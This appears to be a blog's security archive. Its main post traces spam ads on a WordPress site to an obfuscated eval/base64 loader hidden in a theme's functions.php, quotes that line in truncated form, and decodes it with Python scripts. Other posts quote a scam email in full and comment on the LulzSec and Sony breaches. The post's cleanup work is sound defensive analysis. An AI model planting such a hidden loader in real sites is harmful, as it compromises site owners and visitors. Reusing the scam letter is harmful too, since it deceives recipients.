Category Archives: Security

WordPress Injected Advertisements

I’ve debated on writing this up because I don’t understand a lot about exactly what happened, but I’ll post as much information here as I can.

The problem: I took over the management of a simple WordPress site several months ago, and haven’t had any problems.  I don’t host it or own the domain, so most of what I have to do involves content.  A few weeks ago an ad appeared above the menu (we’re using the Twenty Eleven theme) and I couldn’t pinpoint it.  The text and link varied, and a look at the header code in the theme revealed nothing.  Still, the HTML showed up in the rendered page (and across the site).  The latest was related to “viagra from india” or something like that.  A crude markup shows where the content was injected:

[Screenshot: wordPressHack01, the injected ad marked up above the site menu]

My client finally called me and was quite worried, which was justified.  I had looked into it but honestly hadn’t put in the time to dig in.  I sat down a couple of days ago and did a little searching, and came up with a few things to try – one of which was addressing the possibility that a plugin used on the site had been compromised.

Looking through the installed plugins, I noticed one that didn’t look like it was necessary and involved disabling menu items.  I disabled the plugin, refreshed the page, and the ad was gone.  Solved!

No it wasn’t.

My client called yesterday and said the ad was still there.  I pulled up the site and didn’t see it.   Thinking that maybe it had something to do with the content filter at work, I told him I’d do some research and get back to him.

I got home last night, pulled up the site, and the ad was displayed.  I logged in to the admin panel, poked around a bit, and went back to the site – no ad.  Turns out the ads don’t display if you have a cookie saved from the site’s admin panel.

More Googling: A couple more searches led me to this post at StackExchange, revealing something I wasn’t looking for but had seen earlier when looking at the site’s files.  Specifically, it was a line in the theme’s functions.php file that looked like this:

```php
<?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave')); $wp_function_initialize(strrev(';))"=owOpICcoB3Xu9Wa0Nmb1Z2XrNWYixGbhNmIoQ...
[...a very long string - 6416 characters in my case...]
...Q9QnblRnbvNGJ7IiI9QnblRnbvNGJ7lCbyVHJokTO58FbyV3X0V2Zg42bpR3YuVnZ"(edoced_46esab(lave'));?>
```

I’d seen this before but didn’t pay it much attention (I was looking for offending code in the theme’s display files.)  That StackExchange post really helped me realize that the code in functions.php didn’t belong.  If you look closely you might notice that the code uses PHP’s strrev() function, which reverses a string.  If you reverse the string in the first strrev() call:

strrev(';)a$(lave')

You’ll see that it returns the string eval($a);.  PHP’s eval() function executes a string as PHP code (and is highly discouraged, by the way).  That eval() statement is handed to create_function(), which creates an anonymous function (in this case one that takes a single argument, $a, and evaluates whatever it is given).  There are so many layers to this hack – stay with me here…

The next strrev() call takes that very large string that starts with ;))"=owOpI and ends with (edoced_46esab(lave (hint: that’s eval(base64_decode( reversed.  A clue…).  I copied that string and threw it in my Python terminal to reverse it, and upon discovering that I had a base64-encoded string I decided to decode it and have a look.  My Python code:

```python
import base64

# The reversed base64 blob copied out of the second strrev() call
s = '=owOpICcoB3Xu [...] 2Zg42bpR3YuVnZ'
r = s[::-1]                 # undo strrev(): reverse the string
d = base64.b64decode(r)     # undo base64_decode(); returns bytes in Python 3
print(d.decode('utf-8', errors='replace'))
```

This script takes the string and reverses it, decodes it with the base64 decoder, and prints it.  Out comes over 200 lines of PHP code that does the following (from what I had the energy to decipher):

  • Tries, through several methods, to determine methods by which it can access a URL
  • Detects Google, Bing, and Yahoo robots
  • Checks for the existence of certain cookies (this is how it hides from WP site admins)
  • Accesses one of two different URLs to get content
  • Inserts that content into the site
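As an added example (not the author’s script), here is a small Python deobfuscator that generalises the steps above: it pulls every strrev('...') literal out of a functions.php line, reverses it, base64-decodes any eval(base64_decode("...")) it uncovers, and lists the indicator tokens present either plainly or reversed. The sample line and its inner payload are constructed to mirror the layout quoted above; they are not the real 6416-character string.

```python
import base64
import re

# Constructed stand-in for the injected functions.php line (NOT the real payload):
# the inner PHP is base64-encoded and then reversed, exactly like the real one.
INNER_PHP = 'if (!isset($_COOKIE["wp_marker"])) { echo "<!-- constructed placeholder -->"; }'
_encoded = base64.b64encode(INNER_PHP.encode()).decode()[::-1]
SAMPLE_LINE = (
    "<?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave')); "
    "$wp_function_initialize(strrev(';))\"" + _encoded + "\"(edoced_46esab(lave'));?>"
)

# Single-quoted PHP literals passed to strrev(); backslash escapes are tolerated.
STRREV_RE = re.compile(r"strrev\('((?:[^'\\]|\\.)*)'\)")
# The unwrapped form this hack produces once reversed.
EVAL_B64_RE = re.compile(r'eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\);?')

# Functions commonly chained in obfuscated theme/plugin code.
INDICATORS = ("eval", "base64_decode", "create_function", "strrev", "gzinflate", "str_rot13")


def unwrap_strrev(php_line):
    """Return the contents of every strrev('...') literal, already reversed."""
    return [m.group(1)[::-1] for m in STRREV_RE.finditer(php_line)]


def decode_eval_b64(stmt):
    """If stmt is eval(base64_decode("...")), return the decoded PHP, else None."""
    m = EVAL_B64_RE.fullmatch(stmt.strip())
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")


def indicators(php_line):
    """Indicator tokens present in the line, plainly or written backwards."""
    found = set()
    for tok in INDICATORS:
        if tok in php_line:
            found.add(tok)
        if tok[::-1] in php_line:
            found.add(tok + " (reversed)")
    return sorted(found)


def deobfuscate(php_line):
    """Peel the strrev / eval(base64_decode()) layers and report what was found."""
    layers = unwrap_strrev(php_line)
    payloads = [d for d in (decode_eval_b64(s) for s in layers) if d is not None]
    return {"indicators": indicators(php_line), "layers": layers, "payloads": payloads}


if __name__ == "__main__":
    for key, value in deobfuscate(SAMPLE_LINE).items():
        print(key, "->", value)
```

Running it against a real functions.php line only decodes the first layer; if the decoded payload itself contains another eval(base64_decode()) wrapper, feed it back through decode_eval_b64() until plain PHP remains.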

Once found, it was very easy to get rid of.  At first I simply commented the line in the functions.php and verified problem resolution, and then deleted the line.  Going through the code, while not necessary, was an interesting 120 minutes.  I even went so far as to manually browse to one of the URLs it contacted, and it only spit out a base64 string to the browser.

Curious, I decoded that string with Python, which unsurprisingly revealed this:

</div>||||||</div>|||<a href="http://lakeshorewinecellars.com/buy-viagra-from-india/">buy viagra from india</a>

And there you have it.  Happy hunting!

For Some Reason I Didn’t Publish This When I Wrote It

Found this post in my unpublished list just now:

I just read a story at PC World that revealed the obvious fact that the breaches by LulzSec and Anonymous were avoidable.  The groups used SQL Injection, XSS, social engineering, and took advantage of the misstep by their victims of not encrypting their data at rest.  All of these security practices were and have been avoidable – it’s up to the data maintainer to know about these vulnerabilities beforehand and to keep up with the latest security threats.

Anonymous also used a really old, published exploit (for which a patch was available but never applied) in a Linux system at HB Gary during their playtime with that company and its schmuck CEO.

Security should always be a paramount issue at any organization that handles data for any type of computer users.  Sony failed to keep its users’ data secure, as did the other companies LulzSec and Anonymous have hammered in the past months.  And while releasing all the usernames, e-mails, and passwords was probably not a good idea and caused a lot of grief for millions of people, the companies themselves should be held responsible.  After all, if they had done what is right they wouldn’t be going through this misery right now.


Wow. Really? Wow…

Got this in my spam today and thought you might want a good read.  It’s amazing that these people are successful.

Good Evening
I have been in your country since 6:31pm at George Bush Intercontinental/Houston Airport (IAH), Houston, Texas port of entry at the North side of Houston,Texas with my partner and have been so busy with the custom authorities here at George Bush Intercontinental Airport , having done extensively on this assignment towards carrying out the delivery of consignment to your doorstep without further delay or sanctions whatsoever.

In consequent to this, I have been required by the authority to sign some vital documentations in respect of your consignment as the code of precedence in line with diplomatic delivery directives.

So I advise that you verify/re-confirm your current residential address to me,and also tell me the nearest airport to your home to avoid mistake,because as soon as i clear this problems with the custom authorities and sign some paper works i will be heading to your home address by tomorrow evening.

I am very busy now at the custom authority office here at George Bush Intercontinental Airport ,as soon as am through speaking with the head of the authorities i will give you a call,so i advised that you keep your mobile phone open for easy communications.

Finally. I will be oblige to ensure that your package is delivered to you as soon as i settle this issue with the customs,and also do not contact any other person apart from me the diplomat of your consignment.

Once again,thanks for helping me serve you better.

Yours Faithfully.

Mr John Newman

I don’t normally look at these things, but since I’ve read this I have decided that they are changing their tactics a bit.  They’re apparently willing to contact you directly instead of asking you to send money up front.  I suppose it makes it seem more real.

Sownage

I don’t usually like Dvorak’s opinion (as I’ve written before), but I just read an article about the latest Sony spillage (pwnage, or what have you) and he actually has a point.  With the whole PSN data breach in the news and the fact that they’re just now turning on services for PSN users again after some 40+ days, it’s amazing to hear yet another story of more insecurity and data leakage from the same company.

Dvorak’s point is that no one cares.  No one has shown up to rise against Sony, no pro-Sony people are coming to its defense.  Even Sony hasn’t acknowledged anything.  Sony has always alienated its customers, in my opinion.  For me it started with the proprietary flash memory in my first digital camera in 2000.  I didn’t have any other Sony product that used that kind of memory, and I had to get a special reader for it as well.

The software that came with our digital video camera in 2005 caused me to send off for a replacement optical drive in my laptop – and I never got the software working.  I ended up with a brand new CD drive and a fresh Windows install to repair all that software had touched.  A set of headphones is the only thing from Sony we’ve bought in the last six years.  They simply don’t provide enough use value for me to go out of my way to get their products.

The lack of securing data is a grave issue for me.  For me, it’s a professional expertise matter.  Even I, the guy who doesn’t have enough experience to be in-demand for simple SysAdmin jobs, knew better than that.  Even I could have designed a database and web front-end to guard from SQL injection.  And I know to encrypt passwords.  Apparently Sony didn’t, with all its experience and professional administrators and developers.  Maybe I did go to the right school after all.

Anyway, Dvorak has a point – I’m curious about the future of Sony and the state of its global reputation.  If I am struck enough by what I read about Sony’s state in the coming months, I’ll revisit the topic.